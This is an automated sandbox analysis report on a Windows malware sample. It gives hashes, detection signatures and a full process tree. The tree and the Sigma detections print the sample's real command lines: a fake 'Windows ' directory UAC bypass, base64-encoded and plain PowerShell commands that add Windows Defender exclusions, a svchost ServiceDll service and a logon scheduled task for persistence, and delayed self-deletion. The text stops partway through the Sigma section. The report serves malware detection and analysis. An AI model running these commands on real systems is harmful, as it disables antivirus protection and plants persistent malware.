Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
dYUteuvmHn.exe

Overview

General Information

Sample name:dYUteuvmHn.exe
renamed because original name is a hash value
Original sample name:f5bd4bbc494017262a22785e5b53f316.exe
Analysis ID:1572166
MD5:f5bd4bbc494017262a22785e5b53f316
SHA1:eed0865613144eba454454d91a2b92fc2717c068
SHA256:79629ab0850f3dd1f61b13a3fd69570425faca6b15a4b453b9a2e0834ee9728e
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: TrustedPath UAC Bypass Pattern
Yara detected Powershell decode and execute
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates a Windows Service pointing to an executable in C:\Windows
Drops executables to the windows directory (C:\Windows) and starts them
Found API chain indicative of debugger detection
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Self deletion via cmd or bat file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious New Service Creation
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious command line found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to create an SMB header
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • dYUteuvmHn.exe (PID: 5804 cmdline: "C:\Users\user\Desktop\dYUteuvmHn.exe" MD5: F5BD4BBC494017262A22785E5B53F316)
    • cmd.exe (PID: 6544 cmdline: cmd.exe /c start "" "C:\Users\user\Desktop\curlapp64.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • curlapp64.exe (PID: 4820 cmdline: "C:\Users\user\Desktop\curlapp64.exe" MD5: 990DCC08D59B375A75DD575701DD2AA4)
        • cmd.exe (PID: 5712 cmdline: cmd.exe /c mkdir "\\?\C:\Windows \System32" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 4028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 5436 cmdline: cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\curlapp64.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 5308 cmdline: timeout /t 10 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
    • cmd.exe (PID: 2876 cmdline: cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\dYUteuvmHn.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 5660 cmdline: timeout /t 10 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
  • curlapp64.exe (PID: 6604 cmdline: "C:\Users\user\Desktop\curlapp64.exe" MD5: 990DCC08D59B375A75DD575701DD2AA4)
    • cmd.exe (PID: 2260 cmdline: cmd.exe /c rmdir /s /q "C:\Windows \" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3276 cmdline: cmd.exe /c mkdir "\\?\C:\Windows \System32" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3288 cmdline: cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\curlapp64.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 6692 cmdline: timeout /t 10 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
  • curlapp64.exe (PID: 1264 cmdline: "C:\Users\user\Desktop\curlapp64.exe" MD5: 990DCC08D59B375A75DD575701DD2AA4)
    • cmd.exe (PID: 5852 cmdline: cmd.exe /c rmdir /s /q "C:\Windows \" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5068 cmdline: cmd.exe /c mkdir "\\?\C:\Windows \System32" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5804 cmdline: cmd.exe /c start "" "C:\Windows \System32\printui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • printui.exe (PID: 6308 cmdline: "C:\Windows \System32\printui.exe" MD5: 2FC3530F3E05667F8240FC77F7486E7E)
      • printui.exe (PID: 5252 cmdline: "C:\Windows \System32\printui.exe" MD5: 2FC3530F3E05667F8240FC77F7486E7E)
      • printui.exe (PID: 6336 cmdline: "C:\Windows \System32\printui.exe" MD5: 2FC3530F3E05667F8240FC77F7486E7E)
        • cmd.exe (PID: 4524 cmdline: cmd.exe /c powershell -Command "$dec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $dec;" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 4084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7112 cmdline: powershell -Command "$dec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $dec;" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 3012 cmdline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2260 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 3092 cmdline: cmd.exe /c sc create x610437 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x610437\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x610437.dat" /f && sc start x610437 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 2128 cmdline: sc create x610437 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • reg.exe (PID: 4352 cmdline: reg add HKLM\SYSTEM\CurrentControlSet\services\x610437\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x610437.dat" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • sc.exe (PID: 2748 cmdline: sc start x610437 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • cmd.exe (PID: 1252 cmdline: cmd.exe /c start "" "C:\Windows\System32\console_zero.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • console_zero.exe (PID: 6420 cmdline: "C:\Windows\System32\console_zero.exe" MD5: A11604F5C925DDAADF2988AF05F4071B)
            • cmd.exe (PID: 5796 cmdline: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 3480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 6552 cmdline: schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • cmd.exe (PID: 6820 cmdline: cmd.exe /c start "" "C:\Windows\System32\bav64.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • bav64.exe (PID: 3176 cmdline: "C:\Windows\System32\bav64.exe" MD5: DBE920F6626DB0DDCC757F787C855DF4)
            • conhost.exe (PID: 4112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 5612 cmdline: cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • powershell.exe (PID: 7060 cmdline: powershell -Command "Remove-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • cmd.exe (PID: 2380 cmdline: cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • powershell.exe (PID: 5356 cmdline: powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users'" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • cmd.exe (PID: 5848 cmdline: cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users\'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • powershell.exe (PID: 5432 cmdline: powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • cmd.exe (PID: 4296 cmdline: cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\ProgramData'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • powershell.exe (PID: 5656 cmdline: powershell -Command "Remove-MpPreference -ExclusionPath 'C:\ProgramData'" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • cmd.exe (PID: 1268 cmdline: cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files (x86)'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • powershell.exe (PID: 2408 cmdline: powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files (x86)'" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • cmd.exe (PID: 5688 cmdline: cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • powershell.exe (PID: 6548 cmdline: powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files'" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • cmd.exe (PID: 6100 cmdline: cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Windows\TEMP\'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • powershell.exe (PID: 5464 cmdline: powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Windows\TEMP\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • cmd.exe (PID: 6816 cmdline: cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'colorcpl.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • powershell.exe (PID: 2848 cmdline: powershell -Command "Remove-MpPreference -ExclusionPath 'colorcpl.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 5616 cmdline: cmd.exe /c timeout /t 14 /nobreak && rmdir /s /q "C:\Windows \" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 1124 cmdline: timeout /t 14 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • cmd.exe (PID: 612 cmdline: cmd.exe /c timeout /t 16 /nobreak && del /q "C:\Windows\System32\svcldr64.dat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 6704 cmdline: timeout /t 16 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
    • cmd.exe (PID: 356 cmdline: cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\curlapp64.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 2252 cmdline: timeout /t 10 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
  • svchost.exe (PID: 3172 cmdline: C:\Windows\System32\svchost.exe -k DcomLaunch MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • cmd.exe (PID: 2848 cmdline: cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2972 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 5964 cmdline: cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6324 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 3736 cmdline: cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2148 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'E:\' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 2108 cmdline: cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2020 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'F:\' MD5: 04029E121A0CFA5991749937DD22A1D9)
  • console_zero.exe (PID: 5600 cmdline: C:\Windows\System32\console_zero.exe MD5: A11604F5C925DDAADF2988AF05F4071B)
    • cmd.exe (PID: 1368 cmdline: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 1452 cmdline: schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7112INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x58c86:$b2: ::FromBase64String(
  • 0x58dc3:$b2: ::FromBase64String(
  • 0x15b446:$b2: ::FromBase64String(
  • 0x169e67:$b2: ::FromBase64String(
  • 0x16aa76:$b2: ::FromBase64String(
  • 0x16e42f:$b2: ::FromBase64String(
  • 0x16f36f:$b2: ::FromBase64String(
  • 0x1768ff:$b2: ::FromBase64String(
  • 0x19b9df:$b2: ::FromBase64String(
  • 0x21431e:$b2: ::FromBase64String(
  • 0x21445f:$b2: ::FromBase64String(
  • 0x21472f:$b2: ::FromBase64String(
  • 0x214871:$b2: ::FromBase64String(
  • 0x2151b4:$b2: ::FromBase64String(
  • 0x2152f1:$b2: ::FromBase64String(
  • 0x218a63:$b2: ::FromBase64String(
  • 0x218ba2:$b2: ::FromBase64String(
  • 0x218ee4:$b2: ::FromBase64String(
  • 0x2191de:$b2: ::FromBase64String(
  • 0x22b33e:$b2: ::FromBase64String(
  • 0x22b47b:$b2: ::FromBase64String(

Other

SourceRuleDescriptionAuthorStrings
amsi64_7112.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: TrustedPath UAC Bypass Pattern
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows \System32\printui.exe" , CommandLine: "C:\Windows \System32\printui.exe" , CommandLine|base64offset|contains: , Image: C:\Windows \System32\printui.exe, NewProcessName: C:\Windows \System32\printui.exe, OriginalFileName: C:\Windows \System32\printui.exe, ParentCommandLine: cmd.exe /c start "" "C:\Windows \System32\printui.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5804, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows \System32\printui.exe" , ProcessId: 6308, ProcessName: printui.exe
    Sigma detected: Base64 Encoded PowerShell Command Detected
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell -Command "$dec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $dec;", CommandLine: cmd.exe /c powershell -Command "$dec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $dec;", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows \System32\printui.exe" , ParentImage: C:\Windows \System32\printui.exe, ParentProcessId: 6336, ParentProcessName: printui.exe, ProcessCommandLine: cmd.exe /c powershell -Command "$dec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $dec;", ProcessId: 4524, ProcessName: cmd.exe
    Sigma detected: Invoke-Obfuscation CLIP+ Launcher
    Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, CommandLine: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\console_zero.exe" , ParentImage: C:\Windows\System32\console_zero.exe, ParentProcessId: 6420, ParentProcessName: console_zero.exe, ProcessCommandLine: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, ProcessId: 5796, ProcessName: cmd.exe
    Sigma detected: Invoke-Obfuscation VAR+ Launcher
    Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, CommandLine: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\console_zero.exe" , ParentImage: C:\Windows\System32\console_zero.exe, ParentProcessId: 6420, ParentProcessName: console_zero.exe, ProcessCommandLine: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, ProcessId: 5796, ProcessName: cmd.exe
    Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell -Command "$dec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $dec;", CommandLine: cmd.exe /c powershell -Command "$dec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $dec;", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows \System32\printui.exe" , ParentImage: C:\Windows \System32\printui.exe, ParentProcessId: 6336, ParentProcessName: printui.exe, ProcessCommandLine: cmd.exe /c powershell -Command "$dec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $dec;", ProcessId: 4524, ProcessName: cmd.exe
    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';", CommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows \System32\printui.exe" , ParentImage: C:\Windows \System32\printui.exe, ParentProcessId: 6336, ParentProcessName: printui.exe, ProcessCommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';", ProcessId: 3012, ProcessName: cmd.exe
    Sigma detected: Suspicious New Service Creation
    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create x610437 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine: sc create x610437 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd.exe /c sc create x610437 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x610437\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x610437.dat" /f && sc start x610437, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3092, ParentProcessName: cmd.exe, 